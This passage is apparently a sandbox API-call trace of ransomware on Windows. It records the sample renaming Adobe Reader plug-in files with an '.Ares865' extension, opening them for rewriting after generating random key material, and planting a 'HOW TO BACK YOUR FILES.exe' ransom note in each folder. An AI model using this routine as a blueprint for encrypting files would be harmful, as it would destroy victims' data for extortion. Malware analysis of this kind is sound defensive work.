lpString1=0x2cce498, lpString2="Mcimpp.HUN" | out: lpString1="Mcimpp.HUN") returned="Mcimpp.HUN" [0172.913] lstrlenW (lpString="Mcimpp.HUN") returned 10 [0172.913] lstrlenW (lpString="Ares865") returned 7 [0172.913] lstrcmpiW (lpString1="mpp.HUN", lpString2="Ares865") returned 1 [0172.913] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\Mcimpp.HUN.Ares865") returned 94 [0172.913] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\Mcimpp.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\mcimpp.hun"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\Mcimpp.HUN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\mcimpp.hun.ares865"), dwFlags=0x1) returned 1 [0172.916] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\Mcimpp.HUN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\mcimpp.hun.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.916] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0172.916] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.917] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.917] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.920] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.920] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.921] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.921] lstrcpyW (in: lpString1=0x2cce498, lpString2="QuickTime.HUN" | out: lpString1="QuickTime.HUN") returned="QuickTime.HUN" [0172.921] lstrlenW (lpString="QuickTime.HUN") returned 13 [0172.921] lstrlenW (lpString="Ares865") returned 7 [0172.921] lstrcmpiW (lpString1="ime.HUN", lpString2="Ares865") returned 1 [0172.922] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\QuickTime.HUN.Ares865") returned 97 [0172.922] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\QuickTime.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\quicktime.hun"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\QuickTime.HUN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\quicktime.hun.ares865"), dwFlags=0x1) returned 1 [0172.923] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\QuickTime.HUN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\quicktime.hun.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.924] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.924] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.925] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.925] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.927] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.927] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.927] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.928] lstrcpyW (in: lpString1=0x2cce498, lpString2="WindowsMedia.HUN" | out: lpString1="WindowsMedia.HUN") returned="WindowsMedia.HUN" [0172.928] lstrlenW (lpString="WindowsMedia.HUN") returned 16 [0172.928] lstrlenW (lpString="Ares865") returned 7 [0172.928] lstrcmpiW (lpString1="dia.HUN", lpString2="Ares865") returned 1 [0172.928] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\WindowsMedia.HUN.Ares865") returned 100 [0172.929] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\WindowsMedia.HUN" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\windowsmedia.hun"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\WindowsMedia.HUN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\windowsmedia.hun.ares865"), dwFlags=0x1) returned 1 [0172.930] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HUN\\WindowsMedia.HUN.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hun\\windowsmedia.hun.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.930] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.931] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.931] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.931] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.934] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.934] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.934] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.935] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV" [0172.935] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV" [0172.935] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.935] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\how to back your files.exe"), bFailIfExists=1) returned 0 [0172.936] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.937] GetLastError () returned 0x0 [0172.937] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0172.937] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d853f20, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x549475c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x549475c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0172.937] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0172.937] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0172.937] lstrcpyW (in: lpString1=0x2cce498, lpString2="Flash.HRV" | out: lpString1="Flash.HRV") returned="Flash.HRV" [0172.937] lstrlenW (lpString="Flash.HRV") returned 9 [0172.937] lstrlenW (lpString="Ares865") returned 7 [0172.937] lstrcmpiW (lpString1="ash.HRV", lpString2="Ares865") returned 1 [0172.938] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\Flash.HRV.Ares865") returned 93 [0172.938] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\Flash.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\flash.hrv"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\Flash.HRV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\flash.hrv.ares865"), dwFlags=0x1) returned 1 [0172.939] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\Flash.HRV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\flash.hrv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.940] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.940] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.940] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.940] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.943] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.943] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.943] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.944] lstrcpyW (in: lpString1=0x2cce498, lpString2="MCIMPP.HRV" | out: lpString1="MCIMPP.HRV") returned="MCIMPP.HRV" [0172.944] lstrlenW (lpString="MCIMPP.HRV") returned 10 [0172.944] lstrlenW (lpString="Ares865") returned 7 [0172.944] lstrcmpiW (lpString1="MPP.HRV", lpString2="Ares865") returned 1 [0172.944] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\MCIMPP.HRV.Ares865") returned 94 [0172.944] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\MCIMPP.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\mcimpp.hrv"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\MCIMPP.HRV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\mcimpp.hrv.ares865"), dwFlags=0x1) returned 1 [0172.946] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\MCIMPP.HRV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\mcimpp.hrv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.946] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0172.946] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.947] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.947] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.950] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.950] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.950] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.951] lstrcpyW (in: lpString1=0x2cce498, lpString2="QuickTime.HRV" | out: lpString1="QuickTime.HRV") returned="QuickTime.HRV" [0172.951] lstrlenW (lpString="QuickTime.HRV") returned 13 [0172.951] lstrlenW (lpString="Ares865") returned 7 [0172.951] lstrcmpiW (lpString1="ime.HRV", lpString2="Ares865") returned 1 [0172.952] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\QuickTime.HRV.Ares865") returned 97 [0172.952] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\QuickTime.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\quicktime.hrv"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\QuickTime.HRV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\quicktime.hrv.ares865"), dwFlags=0x1) returned 1 [0172.953] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\QuickTime.HRV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\quicktime.hrv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.953] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.954] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.954] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.954] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.958] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.959] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.959] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.960] lstrcpyW (in: lpString1=0x2cce498, lpString2="WindowsMedia.HRV" | out: lpString1="WindowsMedia.HRV") returned="WindowsMedia.HRV" [0172.960] lstrlenW (lpString="WindowsMedia.HRV") returned 16 [0172.960] lstrlenW (lpString="Ares865") returned 7 [0172.960] lstrcmpiW (lpString1="dia.HRV", lpString2="Ares865") returned 1 [0172.960] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\WindowsMedia.HRV.Ares865") returned 100 [0172.960] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\WindowsMedia.HRV" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\windowsmedia.hrv"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\WindowsMedia.HRV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\windowsmedia.hrv.ares865"), dwFlags=0x1) returned 1 [0172.962] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_HRV\\WindowsMedia.HRV.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_hrv\\windowsmedia.hrv.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.962] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.963] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.963] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.963] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.965] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.966] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.966] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.967] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE", iMaxLength=260 | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE" [0172.967] lstrcatW (in: lpString1="", lpString2="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE" | out: lpString1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE") returned="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE" [0172.967] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0172.967] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\how to back your files.exe"), bFailIfExists=1) returned 0 [0172.968] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0172.969] GetLastError () returned 0x0 [0172.969] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0172.969] FindFirstFileW (in: lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x7d82ddc0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0x549475c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x549475c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccee8 [0172.969] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0172.969] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0172.969] lstrcpyW (in: lpString1=0x2cce498, lpString2="Flash.CZE" | out: lpString1="Flash.CZE") returned="Flash.CZE" [0172.969] lstrlenW (lpString="Flash.CZE") returned 9 [0172.969] lstrlenW (lpString="Ares865") returned 7 [0172.969] lstrcmpiW (lpString1="ash.CZE", lpString2="Ares865") returned 1 [0172.970] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\Flash.CZE.Ares865") returned 93 [0172.970] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\Flash.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\flash.cze"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\Flash.CZE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\flash.cze.ares865"), dwFlags=0x1) returned 1 [0172.971] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\Flash.CZE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\flash.cze.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.971] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=2560) returned 1 [0172.972] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.972] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0172.972] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.975] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0172.975] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0172.975] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0172.976] lstrcpyW (in: lpString1=0x2cce498, lpString2="Mcimpp.CZE" | out: lpString1="Mcimpp.CZE") returned="Mcimpp.CZE" [0172.976] lstrlenW (lpString="Mcimpp.CZE") returned 10 [0172.976] lstrlenW (lpString="Ares865") returned 7 [0172.976] lstrcmpiW (lpString1="mpp.CZE", lpString2="Ares865") returned 1 [0172.976] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\Mcimpp.CZE.Ares865") returned 94 [0172.976] MoveFileExW (lpExistingFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\Mcimpp.CZE" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\mcimpp.cze"), lpNewFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\Mcimpp.CZE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\mcimpp.cze.ares865"), dwFlags=0x1) returned 1 [0172.978] CreateFileW (lpFileName="C:\\Program Files (x86)\\Adobe\\Reader 10.0\\Reader\\plug_ins\\Multimedia\\MPP_CZE\\Mcimpp.CZE.Ares865" (normalized: "c:\\program files (x86)\\adobe\\reader 10.0\\reader\\plug_ins\\multimedia\\mpp_cze\\mcimpp.cze.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0172.978] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=8192) returned 1 [0172.979] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0172.979] CryptGenRandom 